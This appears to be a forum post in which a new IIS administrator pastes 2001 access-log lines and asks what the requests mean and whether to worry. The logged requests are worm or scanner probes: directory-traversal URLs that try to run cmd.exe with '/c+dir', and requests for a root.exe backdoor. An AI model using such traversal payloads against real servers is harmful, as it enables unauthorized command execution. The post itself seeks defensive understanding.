Hi, I have just installed IIS and am looking over the logs. Oftentimes, I see something like the following lines (edited to protect the parties involved):
#Fields: date time c-ip cs-username cs-method cs-uri-stem cs-uri-query sc-status cs(Referer)
2001-10-30 12:19:49 –.—.—.— – GET /scripts/root.exe /c+dir 401 –
2001-10-30 12:19:53 –.—.—.— – GET /MSADC/root.exe /c+dir 401 –
2001-10-30 12:19:56 –.—.—.— – GET /c/winnt/system32/cmd.exe /c+dir 404 –
2001-10-30 12:19:59 –.—.—.— – GET /d/winnt/system32/cmd.exe /c+dir 404 –
2001-10-30 12:20:02 –.—.—.— – GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 –
2001-10-30 12:20:06 –.—.—.— – GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 –
2001-10-30 12:20:09 –.—.—.— – GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 –
2001-10-30 12:20:12 –.—.—.— – GET /msadc/..%5c../..%5c../..%5c/..?�../..?�../..?�../winnt/system32/cmd.exe /c+dir401 –
2001-10-30 12:20:16 –.—.—.— – GET /scripts/..?�../winnt/system32/cmd.exe /c+dir 401 –
2001-10-30 12:20:19 –.—.—.— – GET /scripts/winnt/system32/cmd.exe /c+dir 401 –
2001-10-30 12:20:26 –.—.—.— – GET /winnt/system32/cmd.exe /c+dir 404 –
2001-10-30 12:20:29 –.—.—.— – GET /winnt/system32/cmd.exe /c+dir 404 –
2001-10-30 12:20:32 –.—.—.— – GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 –
2001-10-30 12:20:45 –.—.—.— – GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 –
2001-10-30 12:21:38 –.—.—.— – GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 –
2001-10-30 12:21:41 –.—.—.— – GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 401 –
What is this person doing and is it something I need to be worried about? I have seen multiple people do things of a similar nature over the last 3 days and I’m not quite sure what it means.
